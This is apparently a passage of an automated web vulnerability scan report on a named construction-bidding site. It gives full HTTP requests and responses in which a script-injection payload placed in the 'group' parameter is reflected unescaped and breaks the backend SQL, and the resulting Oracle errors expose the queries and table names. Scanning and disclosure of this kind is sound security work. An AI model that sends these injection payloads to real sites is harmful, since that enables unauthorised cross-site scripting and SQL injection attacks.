color="#FF0000">2011/03/01 14:03:35.587 [ 1] (TP-Processor1569) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no='"--></style></script><script>netsparker(0x0001EB)</script>) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:03:35 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:03:35 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 7906
Content-Type: text/html;charset=utf-8
<script language="javascript1.1">function DownloadBidTab(sjobNbr){ req_window = window.open ("/qap/projects/prj_browse/prj_download_bid_tab.html?job_no=" + sjobNbr,"","height=300,width=500");}function ShowViewResults(jobPK){ var w = window.open('/qap/projects/prj_browse/ipp_prj_view.html?ShowProjectDetails=TRUE&viewOnly=TRUE&group='"--></style></script><script>netsparker(0x0001EB)</script>&provider=765295&jobPK=' + jobPK, 'ViewResults', 'status,resizable,scrollbars,width=700,height=600'); w.focus();}function PrintPage(){ window.print();}</script><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001EB%29%3C%2Fscript%3E&provider=765295" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x0001EB%29%3C%2Fscript%3E&provider=765295" ><font color=red size=2 >Project Results</font></a> </td> <td> </td> </tr> </table> </td></tr><tr> <td width="100%" height="100%"> <table width="100%" height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="results_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="10"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="40"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="170"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:03:35.587 [ 1] (TP-Processor1569) Problem including template component SQLLOOP query=" SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no=<?p:group?>) ORDER BY j.bid_date asc " name="Projects"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-01756: quoted string not properly terminated while executing: SELECT j.job_no, DECODE(j.bid_date, null, null, to_char(j.bid_date,'MM/DD/YYYY')), j.name FROM jobs j WHERE j.job_no in ( SELECT DISTINCT j.job_no FROM jobs j, plan_holders ph, provider_group pg WHERE j.job_no = ph.job_no (+) AND (ph.bid_amount IS NOT NULL or j.bid_tab_file_name is not null) AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no='"--></style></script><script>netsparker(0x0001EB)</script>) ORDER BY j.bid_date asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> </table> </td> <td class="results_detail" valign="top" width="100%"> </td> </tr> </table> </td></tr></table></body></html>
|
- /qap/projects/prj_browse/ipp_prj_browse_letting_date.html
/qap/projects/prj_browse/ipp_prj_browse_letting_date.html CONFIRMED |
Parameters
| Parameter | Type | Value |
| jobCategoryNo | GET | 03/03/2011 |
| group | GET | '"--></style></script><script>alert(0x00023A)</script> |
| provider | GET | 765295 |
| sortType | GET | 1 |
Request
GET /qap/projects/prj_browse/ipp_prj_browse_letting_date.html?jobCategoryNo=03%2F03%2F2011&group='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00023A)%3C/script%3E&provider=765295&sortType=1 HTTP/1.1
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Referer: http://qap.questcdn.com/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=11&provider=765295
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: qap.questcdn.com
Cookie: sessionIdentifier=/177428174825690686
Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK
Date: Tue, 01 Mar 2011 20:06:14 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:14 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10067
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023A%29%3C%2Fscript%3E&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023A%29%3C%2Fscript%3E&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023A%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:06:14.716 [ 1] (TP-Processor1683) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = '"--></style></script><script>netsparker(0x00023A)</script> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x00023A)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> <tr> <td><input type="text" value="0" name="ProjectNo" size="23" style="font-family: Courier; font-size:14px" value=""></td> <td><input type="password" name="password" size="20" style="font-family: Courier; font-size:14px"></td> <td><a href="#" onclick="document.frmSearch.submit(); return false;">Search</a></td> </tr> <tr> <td colspan="2" class="body"> <table border="0" cellspacing="0" cellpadding="0" class="body"> <tr> <td style="line-height:5px"> </td> </tr> <tr> <td> Using the <b>QuestCDN eBidDoc™ Number</b> to access the project advertisement and plan documents is an easy task. Just enter the specific <b>QuestCDN eBidDoc™ Number</b> in the eBidDoc field above and click the 'Search' button. This will take you directly to the full text advertisement for that project. Don't forget to enter the password if you are trying to access a protected or hidden project! </td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td></tr><tr> <td></ipp/includes/ipp_coon_rapids_footer.html> </td></tr></table></body></html>
Date: Tue, 01 Mar 2011 20:06:14 GMT
Server: Apache/2.2.4 (Ubuntu) mod_jk/1.2.23 mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3-1ubuntu6
Set-Cookie: sessionIdentifier=/177428174825690686; Expires=Thu, 03-Mar-2011 20:06:14 GMT; Path=/qap
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Length: 10067
Content-Type: text/html;charset=utf-8
<!--$Header: /home/cvsroot/ipp.questcdn.com/www/projects/prj_browse/ipp_prj_browse_letting_date.html,v 1.4 2005/09/13 17:42:49 gkloke Exp $--><!-- webapps/ipp/projects/prj_browse/ipp_prj_browse_letting_date.html --><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html;charset=ISO-8859-1"><title>Bartlett & West - Projects</title><link href="/qap//includes/ipp_bartlett_west.css" rel="stylesheet" media="screen"></head><body><table class="container" cellpadding="0" cellspacing="0" width="100%" height="100%"><tr> <td><img src="/qap/images/bartlett_west.jpg" alt="Bartlett West"> </td></tr><tr> <td> <table class="menubar" cellpadding="0" cellspacing="0" width="100%"> <tr> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_browse_letting_date.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023A%29%3C%2Fscript%3E&provider=765295&sortType=1" >Browse Projects</a> </td> <td class="menu_button" width="150"> <a href="/qap/projects/prj_browse/ipp_prj_view.html?current_sub_tab=view_projects&group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023A%29%3C%2Fscript%3E&provider=765295&sortType=1" >Project Results</a> </td> <td> </td> </tr> <tr> <td class="menu_link" width="200"> <a href="/qap/projects/prj_browse/ipp_prj_browse.html?group=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x00023A%29%3C%2Fscript%3E&provider=765295" >Click Here To Sort By Category</a> </td> </tr> </table> </td></tr><tr><!--BGP1--> <td height="100%"> <table height="100%" cellpadding="0" cellspacing="0"> <tr> <td class="prj_tree" width="275" height="100%" valign="top"> <table width="244" height="100%" border="0" cellspacing="0" cellpadding="0"> <tr height="20"> <td width="14" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="10" border="0"></td> <td width="20" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="20" border="0"></td> <td width="210" height="20"><img src="/qap/images/elements/el_dot_clear.gif" alt="" height="1" width="210" border="0"></td> </tr> <font color="#FF0000">2011/03/01 14:06:14.716 [ 1] (TP-Processor1683) Problem including template component SQLLOOP query=" SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = <?p:group?> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc " name="q1"<pre><a href="http://java.sun.com/products/jdk/1.2/docs/api/java/sql/SQLException.html" target="new">java.sql.SQLException</a>: ORA-00933: SQL command not properly ended while executing: SELECT TO_CHAR(j.bid_date,'MM/DD/YYYY'), COUNT(j.bid_date) n_projects FROM job_categories jc, jobs j, job_types jt, provider_group pg WHERE jc.job_category_no = j.job_category_no(+) AND j.job_type_no = jt.job_type_no (+) AND ( jt.name <> 'hidden' OR jt.name IS NULL ) AND j.bid_date >= SYSDATE AND ( j.provider_account_no = pg.provider_no OR j.q_ipp_owner = pg.provider_no ) AND pg.provider_group_no = '"--></style></script><script>netsparker(0x00023A)</script> GROUP BY TO_CHAR(j.bid_date,'MM/DD/YYYY') ORDER BY TO_CHAR(j.bid_date,'MM/DD/YYYY') asc at oracle.jdbc.dbaccess.DBError.throwSqlException(DBError.java:134) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:289) at oracle.jdbc.ttc7.Oall7.receive(Oall7.java:573) at oracle.jdbc.ttc7.TTC7Protocol.doOall7(TTC7Protocol.java:1891) at oracle.jdbc.ttc7.TTC7Protocol.parseExecuteDescribe(TTC7Protocol.java:830) at oracle.jdbc.driver.OracleStatement.doExecuteQuery(OracleStatement.java:2391) at oracle.jdbc.driver.OracleStatement.doExecuteWithTimeout(OracleStatement.java:2672) at oracle.jdbc.driver.OracleStatement.executeQuery(OracleStatement.java:572) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:531) at dynamic.dbtk.connection.ConnectionWrapper.select(ConnectionWrapper.java:622) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:91) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.IfComponent.includeInternal(IfComponent.java:126) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.components.SQLLoopComponent.includeInternal(SQLLoopComponent.java:110) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.TemplateComponent.includeChildren(TemplateComponent.java:314) at dynamic.intraframe.templates.Template.includeInternal(Template.java:86) at dynamic.intraframe.templates.TemplateComponent.include(TemplateComponent.java:167) at dynamic.intraframe.templates.Template.include(Template.java:59) at dynamic.intraframe.engine.BaseApplicationContext.handleTemplate(BaseApplicationContext.java:1024) at dynamic.intraframe.engine.BaseApplicationContext.handle(BaseApplicationContext.java:844) at dynamic.intraframe.engine.BaseServlet.service(BaseServlet.java:237) at javax.servlet.http.HttpServlet.service(HttpServlet.java:802) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:269) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:188) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:213) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:174) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:127) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:117) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:108) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:151) at org.apache.jk.server.JkCoyoteHandler.invoke(JkCoyoteHandler.java:200) at org.apache.jk.common.HandlerRequest.invoke(HandlerRequest.java:283) at org.apache.jk.common.ChannelSocket.invoke(ChannelSocket.java:773) at org.apache.jk.common.ChannelSocket.processConnection(ChannelSocket.java:703) at org.apache.jk.common.ChannelSocket$SocketConnection.runIt(ChannelSocket.java:895) at org.apache.tomcat.util.threads.ThreadPool$ControlRunnable.run(ThreadPool.java:689) at java.lang.Thread.run(Thread.java:619)</pre></font> <tr> <td colspan="3"> </td> </tr> <tr> <td width="14"> </td> <td colspan="2" width="230"> <span class="copyright">© 1999-2010 Quest Construction Data Network, LLC</span> </td> </tr> <tr> <td colspan="3" height="100%"> </td> </tr> </table> </td><!--BGP5--> <td class="body" width="100%" height="100%" valign="top"> <h3>SEARCH PROJECTS</h3> <form name="frmSearch" action="/qap/action/IPPprojectSearch" method="post"> <input type="hidden" name="SearchType" value="1"> <input type="hidden" name="SQL" value=""> <input type="hidden" name="provider" value="765295"> <input type="hidden" name="group" value="'"--></style></script><script>netsparker(0x00023A)</script>"> <table width="590" border="0" cellspacing="0"> <tr> <td class="search_label" width="240">QuestCDN eBidDoc™ Number</td> <td class="search_label" width="240">Password (If Required)</td> <td width="100" class="bodygrn-bold"> </td> </tr> 